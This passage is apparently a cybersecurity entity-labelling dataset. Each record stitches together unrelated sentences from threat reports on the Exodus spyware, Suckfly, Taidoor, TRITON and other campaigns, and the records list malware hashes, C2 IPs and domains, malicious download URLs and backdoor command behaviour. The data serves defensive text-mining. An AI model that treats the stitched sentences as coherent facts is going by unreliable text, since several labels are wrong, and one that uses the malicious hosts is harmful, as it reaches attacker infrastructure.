f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . 
imgonline-com-ua-dexifEEdWuIbNSv7G.jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 73, "end": 80, "label": "System"}, {"start": 215, "end": 238, "label": "Organization"}, {"start": 256, "end": 320, "label": "Indicator"}, {"start": 323, "end": 361, "label": "Indicator"}, {"start": 368, "end": 371, "label": "Organization"}]} {"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device . Suckfly conducted a multistage attack against an e-commerce organization based in India . potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb . \u2022 Other actors merged into this group : 6 UNC1878 is a financially motivated group that monetizes their intrusions by extorting their victims following the deployment of RYUK ransomware .", "spans": [{"start": 213, "end": 236, "label": "Organization"}, {"start": 382, "end": 446, "label": "Indicator"}, {"start": 491, "end": 498, "label": "Organization"}, {"start": 567, "end": 615, "label": "Organization"}, {"start": 619, "end": 634, "label": "System"}]} {"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . 
Asala.mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 268, "end": 278, "label": "Organization"}, {"start": 282, "end": 310, "label": "Organization"}, {"start": 331, "end": 340, "label": "Indicator"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 399, "end": 409, "label": "System"}]} {"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector . An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : \u201c where is my loved one? \u201d ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 . Since the beginning of 2023 , the majority of observed KillNet targeting has focused on the U.S. , Europe , and international institutions such as NATO .", "spans": [{"start": 197, "end": 211, "label": "System"}, {"start": 279, "end": 283, "label": "Indicator"}, {"start": 409, "end": 473, "label": "Indicator"}, {"start": 531, "end": 538, "label": "Organization"}]} {"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday . In addition to the documents , the content includes a number of political cartoons that criticize Hamas \u2019 relations with Iran and Hamas \u2019 standing as a resistance movement . 
Facebook stated that the attackers also pretended to work in hospitality , medicine , journalism , NGOs , or airlines , sometimes conversing with their targets for months with profiles across various social media platforms .", "spans": [{"start": 168, "end": 177, "label": "System"}, {"start": 423, "end": 431, "label": "Organization"}]} {"text": "null is not the only payload opening a shell on the phone . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy . While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro E-TOOL that downloads and installs the backdoor used in this attack . The intent of cybercriminals may be evaluated during the research stage of the cyberattack kill chain where they investigate potential entry points , and collect data about the company , users and technology systems in place .", "spans": [{"start": 255, "end": 288, "label": "System"}, {"start": 295, "end": 315, "label": "Organization"}, {"start": 335, "end": 369, "label": "System"}, {"start": 387, "end": 397, "label": "System"}, {"start": 398, "end": 410, "label": "System"}, {"start": 443, "end": 451, "label": "Malware"}]} {"text": "The rootdaemon binary in fact offers several other possibilities to execute commands on the infected device just by connecting to TCP port 6200 and issuing one of the following commands . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction . 
CV Manal 1 : Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": [{"start": 134, "end": 143, "label": "Indicator"}, {"start": 258, "end": 282, "label": "Organization"}, {"start": 309, "end": 333, "label": "Organization"}, {"start": 366, "end": 376, "label": "Indicator"}, {"start": 379, "end": 383, "label": "Organization"}, {"start": 506, "end": 516, "label": "Vulnerability"}, {"start": 520, "end": 535, "label": "System"}]} {"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks . Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f . 
The targeting of a telecommunications company and government also point to the motivation behind the campaign being intelligence gathering , which is the motivation that generally drives Budworm activity .", "spans": [{"start": 30, "end": 39, "label": "Indicator"}, {"start": 421, "end": 430, "label": "Indicator"}, {"start": 617, "end": 641, "label": "Organization"}, {"start": 734, "end": 755, "label": "Organization"}, {"start": 756, "end": 820, "label": "Indicator"}, {"start": 842, "end": 868, "label": "Organization"}, {"start": 873, "end": 883, "label": "Organization"}, {"start": 924, "end": 932, "label": "Organization"}, {"start": 1010, "end": 1017, "label": "Organization"}]} {"text": ". During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . Employee-entitlements-2020.doc : What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 144, "end": 168, "label": "Organization"}, {"start": 171, "end": 201, "label": "Indicator"}, {"start": 215, "end": 227, "label": "Malware"}, {"start": 267, "end": 364, "label": "Malware"}, {"start": 375, "end": 393, "label": "Organization"}, {"start": 398, "end": 428, "label": "Organization"}]} {"text": "At the cost of possibly being overly verbose , following is the output of an nmap scan of the infected Android device from a laptop in the same local network , which further demonstrantes the availability of the same open TCP ports that we have mentioned thus far : Identification of eSurv Presence of Italian language At a first look , the first samples of the spyware we obtained did not show immediately evident connections to any company . 
We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations . A statement of the Ministry of Finance on civil and military employee benefits and salaries , discussing the conterversial issue Palestinian Authority employees that have not been paid or paid in full their salaries b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 . The first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy settings enforced on the computer for a specified user .", "spans": [{"start": 284, "end": 289, "label": "Organization"}, {"start": 580, "end": 588, "label": "Organization"}, {"start": 667, "end": 686, "label": "Organization"}, {"start": 777, "end": 798, "label": "Organization"}, {"start": 864, "end": 928, "label": "Indicator"}, {"start": 970, "end": 982, "label": "Organization"}]} {"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro E-TOOL code to run . 
It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 66, "end": 77, "label": "System"}, {"start": 287, "end": 312, "label": "Malware"}, {"start": 345, "end": 358, "label": "Vulnerability"}, {"start": 373, "end": 385, "label": "System"}, {"start": 417, "end": 443, "label": "System"}, {"start": 446, "end": 449, "label": "System"}, {"start": 566, "end": 575, "label": "System"}, {"start": 576, "end": 588, "label": "System"}]} {"text": "Initially some particular words from the decompiled classes.dex of Exodus Two sent us in the right direction . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 . The macro code embedded in the document is rather simple and is not obfuscated . Many of the individuals work at organizations related to financial services , cryptocurrency , blockchain , web3 and related entities .", "spans": [{"start": 52, "end": 63, "label": "Indicator"}, {"start": 67, "end": 73, "label": "Malware"}, {"start": 111, "end": 121, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}]} {"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In fact , it is almost unusual in its unsophistication . 
Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": [{"start": 235, "end": 260, "label": "Malware"}, {"start": 293, "end": 306, "label": "Vulnerability"}, {"start": 321, "end": 333, "label": "System"}, {"start": 365, "end": 391, "label": "System"}, {"start": 394, "end": 397, "label": "System"}]} {"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT . The macro code does the following : COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 222, "end": 227, "label": "System"}, {"start": 230, "end": 241, "label": "System"}, {"start": 248, "end": 253, "label": "System"}, {"start": 292, "end": 304, "label": "Malware"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 431, "end": 443, "label": "Malware"}, {"start": 460, "end": 571, "label": "Indicator"}]} {"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , originally from Calabria . TA459 is well-known for targeting organizations in Russia and neighboring countries . 
Downloads a Base64 encoded payload from the following URL : Apropos of my retrospective report , Bullock found that a great many messages in Biderman \u2019s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 453, "end": 476, "label": "Organization"}, {"start": 483, "end": 508, "label": "Organization"}]} {"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . http://linda-callaghan.icu/Minkowski/brown . Check the memory size with to check if it is less than 2 GB .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 449, "end": 491, "label": "Indicator"}, {"start": 500, "end": 553, "label": "Indicator"}]} {"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ . Using data collected from the Trend Micro\u2122 Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers . Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt . 
Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 149, "end": 166, "label": "System"}, {"start": 169, "end": 192, "label": "Indicator"}, {"start": 223, "end": 260, "label": "Organization"}, {"start": 328, "end": 347, "label": "System"}, {"start": 444, "end": 457, "label": "Organization"}, {"start": 493, "end": 500, "label": "Organization"}, {"start": 530, "end": 547, "label": "Indicator"}, {"start": 562, "end": 575, "label": "System"}]} {"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe . 
First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 33, "end": 45, "label": "Indicator"}, {"start": 145, "end": 170, "label": "Indicator"}, {"start": 173, "end": 206, "label": "Indicator"}, {"start": 209, "end": 241, "label": "Indicator"}, {"start": 242, "end": 266, "label": "Indicator"}, {"start": 421, "end": 456, "label": "Indicator"}, {"start": 488, "end": 498, "label": "Malware"}]} {"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues . Runs the executable file and deletes the .txt file . \u201c Who or what is asdfdfsda@asdf.com ? 
, \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 124, "end": 135, "label": "Indicator"}, {"start": 136, "end": 147, "label": "Indicator"}, {"start": 148, "end": 161, "label": "Indicator"}, {"start": 162, "end": 175, "label": "Indicator"}, {"start": 176, "end": 188, "label": "Indicator"}, {"start": 189, "end": 202, "label": "Indicator"}, {"start": 203, "end": 215, "label": "Indicator"}, {"start": 216, "end": 226, "label": "Indicator"}, {"start": 227, "end": 241, "label": "Indicator"}, {"start": 486, "end": 496, "label": "Organization"}, {"start": 665, "end": 669, "label": "Indicator"}, {"start": 694, "end": 712, "label": "Organization"}, {"start": 719, "end": 727, "label": "Organization"}]} {"text": ". Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments . Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 70, "end": 72, "label": "System"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 201, "end": 209, "label": "Malware"}, {"start": 247, "end": 255, "label": "System"}, {"start": 267, "end": 273, "label": "System"}, {"start": 361, "end": 370, "label": "Organization"}]} {"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government . It enables the attackers to spy on victims using rather basic backdoor capabilities . 
Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 180, "end": 190, "label": "Organization"}, {"start": 255, "end": 263, "label": "Malware"}, {"start": 279, "end": 335, "label": "Organization"}]} {"text": "The Command & Control server also displays a favicon image which looks like a small orange ball . Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange . While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers . The network sees a high number of data access and transfer requests by the same user , who may be authorized , but does not regularly work with the targeted data assets and network resources .", "spans": [{"start": 139, "end": 159, "label": "Organization"}, {"start": 177, "end": 193, "label": "Organization"}, {"start": 220, "end": 243, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 367, "end": 375, "label": "Malware"}, {"start": 547, "end": 737, "label": "Indicator"}]} {"text": "At the time of writing , a reverse image search for the favicon on Shodan using the query http.favicon.hash:990643579 returned around 40 web servers which use the same favicon . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian . 
Analyzing the code and data from the C2 , Ryan Sherstobitoff and Asheer Malhotra from McAfee , along with the company 's Advanced Threat Research Team ( ATR ) , discovered new variants of the Rising Sun backdoor that were used since at least 2016 .", "spans": [{"start": 90, "end": 117, "label": "Indicator"}, {"start": 264, "end": 277, "label": "Malware"}, {"start": 297, "end": 336, "label": "Vulnerability"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 397, "end": 399, "label": "System"}, {"start": 504, "end": 506, "label": "System"}, {"start": 509, "end": 527, "label": "Organization"}, {"start": 532, "end": 547, "label": "Organization"}, {"start": 553, "end": 559, "label": "Organization"}, {"start": 588, "end": 625, "label": "Organization"}, {"start": 659, "end": 678, "label": "System"}]} {"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control . This is why we chose to name the malware Pierogi , after the popular East European dish . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 305, "end": 312, "label": "Malware"}, {"start": 354, "end": 359, "label": "Organization"}, {"start": 399, "end": 415, "label": "System"}]} {"text": "Their publicly advertised products include CCTV management systems , surveillance drones , face and license plate recognition systems . The attackers actively sent out malicious documents and maintained several IP addresses for command and control . 
The backdoor has the following capabilities : Organizations can have hundreds , thousands or more of unremediated vulnerabilities that could open the door for an attacker .", "spans": [{"start": 351, "end": 379, "label": "Vulnerability"}, {"start": 412, "end": 420, "label": "Organization"}]} {"text": "eSurv 's logo is identical to the Command & Control server favicon . As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background . Collects information about the infected machine . Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 86, "end": 104, "label": "Organization"}, {"start": 345, "end": 366, "label": "System"}, {"start": 378, "end": 423, "label": "System"}, {"start": 445, "end": 467, "label": "System"}, {"start": 470, "end": 497, "label": "System"}, {"start": 502, "end": 511, "label": "System"}]} {"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples Sometimes , however , certain samples made use of domain names for HTTP communication . Uploads files to the attackers \u2019 server . 
cmd /c \" D:\\pack", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 44, "end": 50, "label": "Organization"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 113, "end": 177, "label": "Indicator"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 478, "end": 494, "label": "Indicator"}]} {"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . Downloads additional payloads . Limited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim environment ; however , in each instance , STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED .", "spans": [{"start": 240, "end": 263, "label": "Indicator"}, {"start": 305, "end": 320, "label": "System"}, {"start": 354, "end": 364, "label": "Malware"}, {"start": 369, "end": 385, "label": "Malware"}, {"start": 492, "end": 502, "label": "Malware"}, {"start": 584, "end": 594, "label": "Malware"}, {"start": 629, "end": 645, "label": "Malware"}]} {"text": "] it ( \" attiva '' is the Italian for \" activate '' ) . The ultimate objective of targeted attacks is to acquire sensitive data . Takes screenshots from the infected machine . RDP is designed to allow legitimate users to remotely connect to and control a system , such as when IT support needs to remotely control an employees computer to troubleshoot an issue or conduct regular maintenance .", "spans": [{"start": 176, "end": 179, "label": "System"}]} {"text": "( We named the spyware \" Exodus '' after this Command & Control domain name . 
In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown . Executes arbitrary commands via the CMD shell . Rather than limiting security to searching for a series of stringent profiles , security teams can attempt to analyze threat indicators in real time .", "spans": [{"start": 97, "end": 104, "label": "Organization"}, {"start": 195, "end": 201, "label": "System"}, {"start": 386, "end": 395, "label": "System"}, {"start": 419, "end": 427, "label": "Organization"}, {"start": 478, "end": 492, "label": "Organization"}, {"start": 516, "end": 533, "label": "Indicator"}]} {"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow . In addition to spy features , the backdoor also implements a few checks to ensure it is running in a safe environment . 
The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 50, "end": 60, "label": "Malware"}, {"start": 211, "end": 219, "label": "Indicator"}, {"start": 333, "end": 347, "label": "Malware"}, {"start": 365, "end": 394, "label": "Indicator"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 547, "end": 553, "label": "System"}, {"start": 659, "end": 667, "label": "Malware"}, {"start": 767, "end": 792, "label": "Organization"}, {"start": 818, "end": 822, "label": "Organization"}, {"start": 851, "end": 858, "label": "Organization"}]} {"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence . Specifically , it looks for antivirus and other security products . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 55, "end": 90, "label": "Indicator"}, {"start": 123, "end": 129, "label": "System"}, {"start": 180, "end": 213, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 332, "end": 350, "label": "Indicator"}, {"start": 355, "end": 365, "label": "Indicator"}, {"start": 382, "end": 403, "label": "Indicator"}]} {"text": "Connexxa was a company also from Catanzaro . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware . The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender . 
Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": [{"start": 196, "end": 207, "label": "System"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 231, "end": 238, "label": "System"}, {"start": 278, "end": 281, "label": "System"}, {"start": 413, "end": 422, "label": "Malware"}, {"start": 425, "end": 430, "label": "Malware"}, {"start": 433, "end": 441, "label": "Malware"}, {"start": 446, "end": 457, "label": "Malware"}, {"start": 467, "end": 484, "label": "Organization"}, {"start": 520, "end": 528, "label": "Organization"}, {"start": 533, "end": 547, "label": "Organization"}]} {"text": "According to publicly available information , the founder of Connexxa seems to also be the CEO of eSurv . In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . The backdoor achieves persistence using a classic startup item autorun technique : Mandiant has also observed the deployment of various remote monitoring and management ( RMM ) tools following the successful exploitation of CVE-2023 - 4966 .", "spans": [{"start": 61, "end": 69, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 220, "end": 242, "label": "Organization"}, {"start": 245, "end": 247, "label": "Organization"}, {"start": 358, "end": 366, "label": "Malware"}, {"start": 490, "end": 536, "label": "System"}, {"start": 578, "end": 593, "label": "Vulnerability"}]} {"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ . 
Additionally , the actor possibly gained a foothold on other target networks\u2014beyond the two intrusions discussed in this post \u2013 using similar strategies . A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup . Indicators of compromise IOCs are pieces of forensic data , such as data found in system log entries or files , that identify potentially malicious activity on a system or network .", "spans": [{"start": 167, "end": 196, "label": "Indicator"}, {"start": 478, "end": 507, "label": "Indicator"}, {"start": 512, "end": 535, "label": "Indicator"}, {"start": 546, "end": 578, "label": "Indicator"}, {"start": 582, "end": 657, "label": "Indicator"}]} {"text": "] it Bologna server1bs.exodus.connexxa [ . There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild . Once the user logs on to the infected machine , the shortcut points to the file binary location in the C:\\ProgramData\\ folder . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 84, "end": 102, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 344, "end": 362, "label": "System"}, {"start": 490, "end": 514, "label": "System"}, {"start": 519, "end": 582, "label": "Indicator"}, {"start": 614, "end": 634, "label": "Organization"}]} {"text": "] it Brescia server1cs.exodus.connexxa [ . 
\u0426\u041d\u0418\u0418\u0425\u041c ) , a Russian government-owned technical research institution located in Moscow . The GUID generated by the malware is saved in a file called GUID.bin . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 91, "end": 111, "label": "Organization"}, {"start": 136, "end": 140, "label": "System"}, {"start": 192, "end": 200, "label": "Indicator"}]} {"text": "] it Cosenza server1ct.exodus.connexxa [ . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute . This file is created in the same folder as the binary of the backdoor To learn more about how ThreatConnect can help you prepare for the potential of a ransomware attack , check out the ThreatConnect Platform .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 149, "end": 155, "label": "System"}, {"start": 278, "end": 286, "label": "Malware"}, {"start": 311, "end": 324, "label": "System"}, {"start": 403, "end": 425, "label": "System"}]} {"text": "] it Catania server1fermo.exodus.connexxa [ . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates . ( C:\\ProgramData\\GUID.bin ) . They are specifically engaged in cyber crime to further their nations own interests .", "spans": [{"start": 13, "end": 45, "label": "Indicator"}]} {"text": "] it server1fi.exodus.connexxa [ . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant . 
The backdoor has rather basic C2 functionality implemented through a predefined set of URLs : Who is the Winnti group ?", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 35, "end": 46, "label": "Organization"}, {"start": 101, "end": 122, "label": "System"}, {"start": 125, "end": 134, "label": "System"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 167, "end": 169, "label": "System"}, {"start": 242, "end": 254, "label": "Organization"}]} {"text": "] it Firenze server1gioiat.exodus.connexxa [ . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection . 1 . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 13, "end": 46, "label": "Indicator"}, {"start": 75, "end": 85, "label": "Organization"}]} {"text": "] it server1na.exodus.connexxa [ . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control . Sending machine information and a heartbeat to the C2 : The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 63, "end": 73, "label": "Organization"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}, {"start": 414, "end": 474, "label": "Organization"}]} {"text": "] it Napoli server1rc.exodus.connexxa [ . 
We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network . URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes : One of the most common techniques used by Cuba actors exploited known vulnerabilities .", "spans": [{"start": 12, "end": 41, "label": "Indicator"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 174, "end": 224, "label": "Indicator"}, {"start": 253, "end": 255, "label": "System"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 331, "end": 352, "label": "Vulnerability"}]} {"text": "] it Reggio Calabria server2ct.exodus.connexxa [ . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity . cname : Combating malware , ransomware , and malicious cyber attacks has always relied on information sharing , exposure of actors TTPs and the dissemination of reliable threat intelligence so that security professionals can quickly develop mitigations , remediations , and update their defenses to block future attacks .", "spans": [{"start": 21, "end": 50, "label": "Indicator"}, {"start": 102, "end": 112, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}, {"start": 214, "end": 235, "label": "Organization"}, {"start": 269, "end": 279, "label": "Organization"}]} {"text": "] it Catania server2cz.exodus.connexxa [ . XENOTIME is easily the most dangerous threat activity publicly known . computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . aname : the location of the malware on the infected machine . 
